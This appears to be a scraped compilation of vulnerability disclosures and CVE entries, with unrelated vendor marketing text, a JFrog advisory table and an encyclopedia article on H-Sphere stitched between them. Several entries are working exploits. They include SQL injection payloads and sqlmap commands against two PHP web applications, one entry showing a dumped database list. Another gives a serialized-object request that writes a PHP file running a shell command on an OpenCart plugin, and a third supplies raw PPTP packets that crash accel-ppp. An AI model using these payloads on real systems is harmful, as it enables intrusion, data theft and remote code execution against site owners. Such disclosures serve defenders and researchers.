Online Discussion Forum Site version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Online Discussion Forum Site 1.0 - 'id' Blind SQL Injection# Date: 15/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Code:line 3 in file "/odfs/posts/view_post.php"$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");# Sqlmap command:sqlmap -u 'http://localhost/odfs/?id=1&p=posts/view_post' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=1' AND 5178=5178-- Iddj&p=posts/view_post    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 6535 FROM (SELECT(SLEEP(5)))amvG)-- ikmN&p=posts/view_post    Type: UNION query    Title: Generic UNION query (NULL) - 12 columns    Payload: id=-3669' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7671,0x65776b4d4272577956694c6549674a64546761564c79566d556255634a426c7a66464e6e527a4779,0x71767a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&p=posts/view_post

Online Discussion Forum Site 1.0 SQL Injection

OpenCart So Listing Tabs component versions 2.2.0 and below suffer from a deserialization vulnerability that can allow for arbitrary file writes.

    [-] Affected Versions:Version 2.2.0 is affected, and prior versions are likely affected too.[-] Vulnerabilities Description:Vulnerable component is switching to another tab. To exploitvulnerability, an attacker may send a POST request (withapplication/x-www-form-urlencoded content-type) to AJAX endpoint(usually "/index.php") with "is_ajax_listing_tabs" parameter set to"1" and "setting" parameter containing a PHP-serialized object,which would be deserialized at server-side. Gadget-chains based on PHPserver-side code can be used to gain remote code execution, filewrite, DOS, etc.So Listing Tabs is an Opencart plugin, so the Opencart PHP classes areavailable in webapp lifecycle. In source code of Opencart there is a PHPgadget-chain which allows to write a file to the server.Using this gadget, an attacker can write .php files with PHP code insideapp's web root and then execute it via requesting them, thus gainingremote codeexecution, which makes insecure deserialization in So Listing Tabsespecially dangerous. Ability to write files can also be used to DOS thesystem by writing large files and exhausting disk space, it can be used toperform XSS attacks by creating HTML files inside web root.Here is an example of request which will write PHP file on serverin /tmp directory:---POST /index.php HTTP/2Host: 0.0.0.0Content-Length: 3870Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://0.0.0.0/is_ajax_listing_tabs=1&ajax_reslisting_start=0&categoryid=p_date_added&setting=a%3a74%3a{s%3a6%3a"action"%3bs%3a9%3a"save_edit"%3b......s%3a2%3a"aa"%3bO%3A9%3A%22DB%5CMySQLi%22%3A1%3A%7Bs%3A21%3A%22%00DB%5CMySQLi%00connection%22%3BO%3A7%3A%22Session%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00adaptor%22%3BO%3A21%3A%22Twig_Cache_Filesystem%22%3A2%3A%7Bs%3A32%3A%22%00Twig_Cache_Filesystem%00directory%22%3BN%3Bs%3A30%3A%22%00Twig_Cache_Filesystem%00options%22%3BN%3B%7Ds%3A13%3A%22%00%2A%00session_id%22%3Bs%3A11%3A%22%2Ftmp%2Fff.php%22%3Bs%3A4%3A%22data%22%3Bs%3A24%3A%22%3C%3Fphp+system%28%22ls+%2F%22%29%3B+%3F%3E%22%3B%7D%7D}&lbmoduleid=157---[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[28/01/2022] - CVE number assigned[31/01/2022] - Vendor contacted[02/02/2022] - Vendor asked for description of vulnerability[02/02/2022] - Send report to vendor[11/02/2022] - Vendor contacted for asking about updates[11/02/2022] - Vendor answered that did not get the report[11/02/2022] - Send report again[16/02/2022] - Vendor contacted to ask about receiving the report[17/02/2022] - Automatic generated answer about overloaded system[07/04/2022] - Vendor contacted again asking for updates[15/05/2022] - Vendor contacted to notify about public disclosure[16/05/2022] - Vendor contacted to notify about public disclosure toenother email[16/05/2022] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the id CVE-2022-24108 to these vulnerabilities.[-] Credits:Vulnerability discovered by    Denis Mironov (SolidSoft LLC),    Alexey Smirnov (SolidSoft LLC),    Daniil Sigalov (SolidSoft LLC),    Dmitry Pavlov (SolidSoft LLC),    Maxim Malkov (SolidSoft LLC)

OpenCart So Listing Tabs 2.2.0 Unsafe Deserialization

T-Soft E-Commerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# CVE: 2022-28132# Date: 18.02.2022######## Description ###############################################  Step-1: Login as Admin or with privilage user#  Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path#  Step-3: Capture the request save as .txt#  Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'#  Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'##  Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...# ########## Proof of Concept ########################################========>>> REQUEST <<<=========GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Sec-Ch-Ua-Platform: "Linux"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://domain.com/srv/admin/products/products-v2/indexAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9=============> RESULTS OF THE SQLMAP <==========================Parameter: SatisAlt (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20---back-end DBMS: MySQL 5available databases [2]:[*] d25082_db[*] information_schema[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

T-Soft E-Commerce 4 SQL Injection

Metasonic Doc WebClient 7.0.14.0 / 7.0.12.0 / 7.0.3.0 is vulnerable to a SQL injection attack in the username field. SSO or System authentication are required to be enabled for vulnerable conditions to exist.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2022-17

CVSSv3 Base / Temporal Score

CVSSv3 Vector

AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N

Affected Products

Metasonic Doc WebClient 7.0.14.0 / 7.0.12.0 / 7.0.3.0

****FREE FOR 30 DAYS****

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Thank You**

Thank you for your interest in Tenable.ot. A representative will be in touch soon.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

FREE FOR 30 DAYS Enjoy full access to detect and fix cloud infrastructure misconfigurations in the design, build and runtime phases of your software development lifecycle.

**Buy Tenable.cs**

Contact a Sales Representative to learn more about Cloud Security and how you can secure every step from code to cloud.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See Tenable.ep In Action**

Know the exposure of every asset on any platform.

CVE-2022-1731: Metasonic Doc WebClient SQL Injection

The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users

CVE-2022-0867

JFrog Artifactory before 7.36.1 and 6.23.41, is vulnerable to Insecure Deserialization of untrusted data which can lead to DoS, Privilege Escalation and Remote Code Execution when a specially crafted request is sent by a low privileged authenticated user due to insufficient validation of a user-provided serialized object.

 Subscribe to the RSS Feed |  SUPPORT

JFrog takes the privacy and security of its customers very seriously and always strives to provide prompt notification and remediation of any vulnerabilities discovered on JFrog products. As a CVE Numbering Authority (CNA), JFrog assigns CVE identification numbers to newly discovered security vulnerabilities.

Severity

CVE

Summary

Product

Versions

Published

Updated

HIGH

**CVE-2021-3860**

JFrog Artifactory prior to version 7.25.4 (Enterprise+ deployments only), is vulnerable to Blind SQL  Injection by a low privileged authenticated user due to incomplete validation when performing an SQL query.

Artifactory

*   Versions prior to 7.25.4
*   Versions prior to 6.23.30

12/15/2021

12/15/2021

MEDIUM

**CVE-2021-45074**

JFrog Artifactory prior to7.29.3 and 6.23.38, is vulnerable to Broken Access Control, a low-privileged user is able to delete other known users OAuth token, which will force a reauthentication on an active session or in the next UI session.

Artifactory

*   Versions prior to 7.29.3
*   Versions prior to 6.23.38

03/02/2022

03/02/2022

LOW

**CVE-2021-46270**

JFrog Artifactory prior to 7.31.10, is vulnerable to Broken Access Control where a project admin user is able to list all available repository names due to insufficient permission validation.

Artifactory

*   Versions prior to 7.31.10

03/02/2022

03/02/2022

HIGH

**CVE-2022-0573**

JFrog Artifactory prior to 7.36.1 and 6.23.41, is vulnerable to Insecure Deserialization of untrusted data which can lead to DoS, Privilege Escalation, and Remote Code Execution when a specially crafted request is sent by a low privileged authenticated user due to insufficient validation of a user-provided serialized object.

Artifactory

*   Versions prior to 7.36.1
*   Versions prior to 6.34.41

12/5/2022

12/5/2022

MEDIUM

**CVE-2021-45730**

JFrog Artifactory prior to 7.31.10, is vulnerable to Broken Access Control where a Project Admin is able to create, edit and delete Repository Layouts while Repository Layouts configuration should only be available for Platform Administrators. 

Artifactory

Versions prior to 7.31.10

18/5/2022

18/5/2022

MEDIUM

**CVE-2021-41834**

JFrog Artifactory prior to versions 7.28.0 and 6.23.38, is vulnerable to Broken Access Control, the copy functionality can be used by a low-privileged user to read and copy any artifact that exists in the Artifactory deployment due to improper permissions validation.

Artifactory

*   Versions prior to 7.28.0
*   Versions prior to 6.23.38

18/5/2022

18/5/2022

CVE-2022-0573: JFrog Security Advisories - JFrog

The Visual Slide Box Builder WordPress plugin through 3.2.9 does not sanitise and escape various parameters before using them in SQL statements via some of its AJAX actions available to any authenticated users (such as subscriber), leading to SQL Injections

CVE-2022-1182

Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter.

H-Sphere

Stable release

3.6.2 / May 15, 2013

Written in

Java

Operating system

Linux, FreeBSD, Windows

Type

Web hosting control panel

License

proprietary

Website

http://www.parallels.com/products/hsphere/

**H-Sphere** is a web hosting Automation Control Panel for shared web hosting services that was developed by Positive Software and acquired by Parallels, Inc. in September 2007.\[1\] It is available for Linux, Unix, and Windows environments, and works with MySQL, PostgreSQL, and Microsoft SQL Server databases. H-Sphere has been written in Java and works with any SQL-compliant database.

**Features\[edit\]**

*   Built-in billing system with variety of payment methods
*   Various hosting solutions (\*nix and Windows, database, load balancing, RealMedia, MS Exchange, SharePoint, FreeVPS, etc.)
*   Electronic mail system with antivirus and antispam filtering and integrated WebMail
*   Around 30 Payment gateways and 6 E-Payment Providers supported
*   Integrated support center
*   Multiple user tools
*   Integrated PHP/MySQL applications, both built-in and by means of add-ons\[2\]

**Advantages\[edit\]**

*   **Scalable multiserver cluster**: different physical and logical servers (web, mail, DNS etc.) are managed from one control panel. More servers can be added on the fly.
*   **Multilingual support** includes English, German, Dutch, French, Italian, Spanish, Russian, Portuguese (Brazil), and several other languages integrated by means of add-ons.
*   H-Sphere is recognized for **end-user features** availability, such as mail system, site building tools, SSL, etc. "Beginning webmasters may find H-Sphere too complicated for their needs. More advanced users, however, appreciate the features and control that H-Sphere offers the end user."
*   H-Sphere may give place to other panels as regards its ease of use, but not its **online documentation**.
*   H-Sphere has enlisted a community of **online supporters** who name it among their favorite control panels.\[3\]
*   Integrated Backup capability with the ClusterLogics system created by Cartika

**Disadvantages\[edit\]**

*   Licenses for H-Sphere accounts are more expensive than those of its competitors. Though, it is noted that H-Sphere licenses are reusable and sold for a cluster, not for a server, as with Ensim Pro.
*   Some customers state H-Sphere has too many advanced features and thus is a too complicated solution for small hosting companies, especially as a single server installation. While others note that H-Sphere advantages are more demonstrable on multi-server clusters.
*   On a single server mode H-Sphere consumes more server resources than other major single server control panels.\[4\]
*   H-Sphere control panel interface extensively uses JavaScript. Some reviewers regard it as a disadvantage.\[5\]
*   H-Sphere control panel by default works on non-standard 8080 and 8443 ports that may be blocked by client-side firewalls; but this can easily be changed in the configuration.
*   H-Sphere (like cPanel, but unlike Plesk) provides online file source editing, however with H-Sphere only allows editing of .txt or .html files and without line numbers in edit mode, thus limiting PHP and other script editing possibilities.

**other webhosting control panel software\[edit\]**

*   Baifox
*   cPanel
*   DirectAdmin
*   Hosting Controller
*   ispCP
*   ISPConfig
*   Kloxo
*   Plesk
*   SysCP
*   Webmin

**See also\[edit\]**

*   Parallels, the maintainers of H-Sphere
*   Web hosting control panel
*   Comparison of web hosting control panels

**References\[edit\]**

1.  **^** "Parallels Newsroom". 28 February 2020.
2.  **^** "Archived copy". Archived from the original on 2007-01-17. Retrieved 2007-05-24.{{cite web}}: CS1 maint: archived copy as title (link) CS1 maint: bot: original URL status unknown (link) 24/7 Solutions.
3.  **^** h-sphere control panels on WHTop.com
4.  **^** Post here, your favorite Control Panel. WebHostingTalk Forums.
5.  **^** "Hosting Obzor". Archived from the original on 2007-06-09. Retrieved 2007-05-24.

**External links\[edit\]**

CVE-2022-30777: H-Sphere

ACCEL-PPP 1.12.0 has an out-of-bounds read in post_msg when processing a call_clear_request.

Using version accel-ppp version 1.12.0-149-gff91c73.

**Summary**

Sending PPTP Call Clear Request Packet after PPTP Start Control Connection Request and PPTP Outgoing Call Request to server can cause stack-buffer-underflow.

**PoC**

Here is the detailed information of sent packets:

*   Packet 1

    hexstream:
    009c00011a2b3c4d00010000010000000000000300000003ffff00016c6f63616c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063616e616e69616e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    
    packet structure:
    ###[ PPTP Start Control Connection Request ]### 
      len       = 156
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Start-Control-Connection-Request
      reserved_0= 0x0
      protocol_version= 256
      reserved_1= 0x0
      framing_capabilities= Asynchronous Framing supported+Synchronous Framing supported
      bearer_capabilities= Analog access supported+Digital access supported
      maximum_channels= 65535
      firmware_revision= 1
      host_name = 'local'
      vendor_string= 'cananian'
    

*   Packet 2

    hexstream:
    00a800011a2b3c4d00070000e60c00000000096000989680000000030000000300030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    
    packet structure:
    ###[ PPTP Outgoing Call Request ]### 
      len       = 168
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Outgoing-Call-Request
      reserved_0= 0x0
      call_id   = 58892
      call_serial_number= 0
      minimum_bps= 2400
      maximum_bps= 10000000
      bearer_type= Any type of channel
      framing_type= Any type of framing
      pkt_window_size= 3
      pkt_proc_delay= 0
      phone_number_len= 0
      reserved_1= 0x0
      phone_number= ''
      subaddress= ''
    

*   Packet 3

    hexstream:
    001000011a2b3c4d000c0000e60c0000
    
    packet structure:
    ###[ PPTP Call Clear Request ]### 
      len       = 16
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Call-Clear-Request
      reserved_0= 0x0
      call_id   = 58892
      reserved_1= 0x0
    

**Hint: the call_id field is randomly generated thus directly forwarding those three packets might not reproduce the scene. To reproduce it, it's neccessary to construct similar packets.**

**Crash report**

log of server:

    [2021-10-18 13:23:01.445] accel-ppp version 1.12.0-149-gff91c73
    [2021-10-18 13:23:01.477] pptp: iprange module disabled, improper IP configuration of PPP interfaces may cause kernel soft lockup
    [2021-10-18 13:23:01.479] l2tp: iprange module disabled, improper IP configuration of PPP interfaces may cause kernel soft lockup
    [2021-10-18 13:23:01.516] pptp: new connection from 127.0.0.1
    [2021-10-18 13:23:01.517] : : recv [PPTP Start-Ctrl-Conn-Request <Version 1> <Framing 3> <Bearer 3> <Max-Chan 65535>]
    [2021-10-18 13:23:01.517] : : send [PPTP Start-Ctrl-Conn-Reply <Version 1> <Result 1> <Error 0> <Framing 3> <Bearer 3> <Max-Chan 1>]
    [2021-10-18 13:23:02.516] : : recv [PPTP Outgoing-Call-Request <Call-ID e60c> <Call-Serial 0> <Min-BPS 2400> <Max-BPS 10000000> <Bearer 3> <Framing 3> <Window-Size 3> <Delay 0>]
    [2021-10-18 13:23:02.517] : : send [PPTP Outgoing-Call-Reply <Call-ID 615> <Peer-Call-ID e60c> <Result 1> <Error 0> <Cause 0> <Speed 10000000> <Window-Size 3> <Delay 0> <Channel 0>]
    [2021-10-18 13:23:02.517] : : lcp_layer_init
    [2021-10-18 13:23:02.517] : : auth_layer_init
    [2021-10-18 13:23:02.517] : : ccp_layer_init
    [2021-10-18 13:23:02.517] : : ipcp_layer_init
    [2021-10-18 13:23:02.517] : : ipv6cp_layer_init
    [2021-10-18 13:23:02.517] : : ppp establishing
    [2021-10-18 13:23:02.518] : 78a9b1ca73684d70: lcp_layer_start
    [2021-10-18 13:23:02.518] : 78a9b1ca73684d70: send [LCP ConfReq id=71 <auth MSCHAP-v2> <mru 1400> <magic 465aee3b>]
    [2021-10-18 13:23:03.495] terminate, sig = 15
    [2021-10-18 13:23:03.495] : 78a9b1ca73684d70: terminate
    [2021-10-18 13:23:03.495] : 78a9b1ca73684d70: lcp_layer_finish
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: pptp: ppp finished
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: send [PPTP Call-Disconnect-Notify <Call-ID ce6> <Result 3> <Error 0> <Cause 0>]
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: send [PPTP Stop-Ctrl-Conn-Request <Reason 0>]
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: lcp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: auth_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ccp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ipcp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ipv6cp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: recv [PPTP Call-Clear-Request <Call-ID e60c>]
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: send [PPTP Call-Disconnect-Notify <Call-ID ce6> <Result 4> <Error 0> <Cause 0>]
    

Here is the asan report:

    ==2434668==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7f785e8afe1f at pc 0x000000499d97 bp 0x7f7862ed07c0 sp 0x7f7862ecff88
    READ of size 149 at 0x7f785e8afe1f thread T7
        #0 0x499d96 in __asan_memcpy /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
        #1 0x7f786b3e5d1f in post_msg /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:150:3
        #2 0x7f786b3e6a19 in send_pptp_call_disconnect_notify /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:385:9
        #3 0x7f786b3e13bd in pptp_call_clear_rqst /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:404:9
        #4 0x7f786b3e13bd in process_packet /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:478:11
        #5 0x7f786b3e13bd in pptp_read /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:527:9
        #6 0x7f78714c81c1 in ctx_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:252:10
        #7 0x7f78714c81c1 in triton_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:192:5
        #8 0x7f7871485608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477:8
        #9 0x7f7870e5e292 in clone /build/glibc-eX1tMB/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
    
    Address 0x7f785e8afe1f is located in stack of thread T7 at offset 31 in frame
        #0 0x7f786b3e666f in send_pptp_call_disconnect_notify /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:373
    
      This frame has 1 object(s):
        [32, 180) 'msg' (line 374) <== Memory access at offset 31 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    Thread T7 created by T0 here:
        #0 0x484d4c in pthread_create /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:205:3
        #1 0x7f78714c6eee in create_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:320:9
        #2 0x7f78714cdc17 in triton_run /root/projects/accel-ppp/accel-pppd/triton/triton.c:744:7
        #3 0x559603 in main /root/projects/accel-ppp/accel-pppd/main.c:415:2
        #4 0x7f7870d630b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: stack-buffer-underflow /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x0fef8bd0df70: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0df80: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0df90: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dfa0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dfb0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
    =>0x0fef8bd0dfc0: f1 f1 f1[f1]00 00 00 00 00 00 00 00 00 00 00 00
      0x0fef8bd0dfd0: 00 00 00 00 00 00 04 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x0fef8bd0dfe0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dff0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0e000: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0e010: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2434668==ABORTING
    

**Reproduce info**

Build access-ppp:

mkdir build && cd build
cmake -DCMAKE\_C\_COMPILER=clang -DCMAKE\_CXX\_COMPILER=clang++ -DCMAKE\_C\_FLAGS="\-fsanitize=address -g" -DCMAKE\_CXX\_FLAGS="\-fsanitize=address -g" -DBUILD\_DRIVER=false -DCMAKE\_INSTALL\_PREFIX=/usr/local -DCMAKE\_BUILD\_TYPE=Debug -DLOG\_PGSQL=TRUE -DSHAPER=TRUE -DRADIUS=TRUE -DNETSNMP=TRUE ..
CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" make -j
make install

Run access-pppd, use the following command:

accel-pppd -c /etc/accel-ppp.conf

The running configuration /etc/accel-ppp.conf is:

    [modules]
     log_file
     #log_syslog
     #log_tcp
     #log_pgsql
     
     pptp
     l2tp
     #sstp
     #pppoe
     #ipoe
     
     auth_mschap_v2
     auth_mschap_v1
     auth_chap_md5
     auth_pap
     
     #radius
     chap-secrets
     
     ippool
     
     pppd_compat
     
     #shaper
     #net-snmp
     #logwtmp
     #connlimit
